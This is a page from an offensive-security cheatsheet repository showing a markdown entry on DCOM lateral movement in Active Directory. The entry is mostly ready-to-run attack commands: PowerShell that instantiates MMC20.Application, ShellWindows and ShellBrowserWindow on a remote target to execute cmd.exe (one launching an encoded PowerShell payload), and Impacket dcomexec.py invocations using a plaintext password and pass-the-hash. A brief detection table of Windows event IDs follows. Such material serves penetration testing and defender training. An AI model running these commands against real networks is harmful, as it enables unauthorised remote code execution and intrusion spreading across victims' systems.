daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-57-dcom-lateral-movement.md (3224B)


      1 ---
      2 title: "Attack #57 — DCOM Lateral Movement"
      3 description: "DCOM (Distributed Component Object Model) allows code execution on remote systems by instantiating COM objects. The MMC20.Application, ShellWindows, and…"
      4 category: active-directory
      5 subcategory: "Lateral Movement"
      6 tags: ["active-directory", "lateral-movement"]
      7 tools: ["Impacket", "PowerShell"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-Seven/⚫ Attack #57 — DCOM Lateral Movement.md"
     11 ---
     12 # ⚫ Attack #57 — DCOM Lateral Movement
     13 
     14 ***
     15 
     16 ## 📖 How It Works
     17 
     18 DCOM (Distributed Component Object Model) allows code execution on remote systems by instantiating COM objects. The `MMC20.Application`, `ShellWindows`, and `ShellBrowserWindow` objects can be abused to execute commands remotely without creating services or writing files — making it stealthier than PsExec.
     19 
     20 ***
     21 
     22 ## ⚙️ Prerequisites
     23 
     24 | Requirement | Detail |
     25 |---|---|
     26 | **Local admin on target** | Required for DCOM activation |
     27 | **DCOM enabled** | Default enabled, port 135 + dynamic RPC |
     28 
     29 ***
     30 
     31 ## 💻 Full Commands
     32 
     33 ```powershell
     34 # ── MMC20.Application ─────────────────────────────────────────────────────────
     35 $com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","TARGET"))
     36 $com.Document.ActiveView.ExecuteShellCommand("cmd.exe",$null,"/c whoami > C:\Temp\out.txt","Minimized")
     37 
     38 # ── ShellWindows ──────────────────────────────────────────────────────────────
     39 $com = [activator]::CreateInstance([type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39","TARGET"))
     40 $com.Item().Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\Windows\System32",$null,0)
     41 
     42 # ── ShellBrowserWindow ────────────────────────────────────────────────────────
     43 $com = [activator]::CreateInstance([type]::GetTypeFromCLSID("C08AFD90-F2A1-11D1-8455-00A0C91F3880","TARGET"))
     44 $com.Document.Application.ShellExecute("cmd.exe","/c powershell -e <base64>","C:\Windows",$null,0)
     45 ```
     46 
     47 ```bash
     48 # ── Impacket — dcomexec.py ────────────────────────────────────────────────────
     49 dcomexec.py corp.local/Administrator:'Password1'@10.10.10.10
     50 
     51 # ── With PtH ──────────────────────────────────────────────────────────────────
     52 dcomexec.py corp.local/Administrator@10.10.10.10 -hashes :2b576acbe6bcfda7294d6bd18041b8fe
     53 ```
     54 
     55 ***
     56 
     57 ## 🛡️ Detection — Event IDs
     58 
     59 | Event ID | Source | What to Look For |
     60 |---|---|---|
     61 | **4624** | Security Log | Logon Type 3 via DCOM |
     62 | **4688** | Security Log | Process creation from mmc.exe or explorer.exe (DCOM host) |
     63 
     64 ***
     65 
     66 > ✅ **Attack #57 — DCOM Lateral Movement complete.**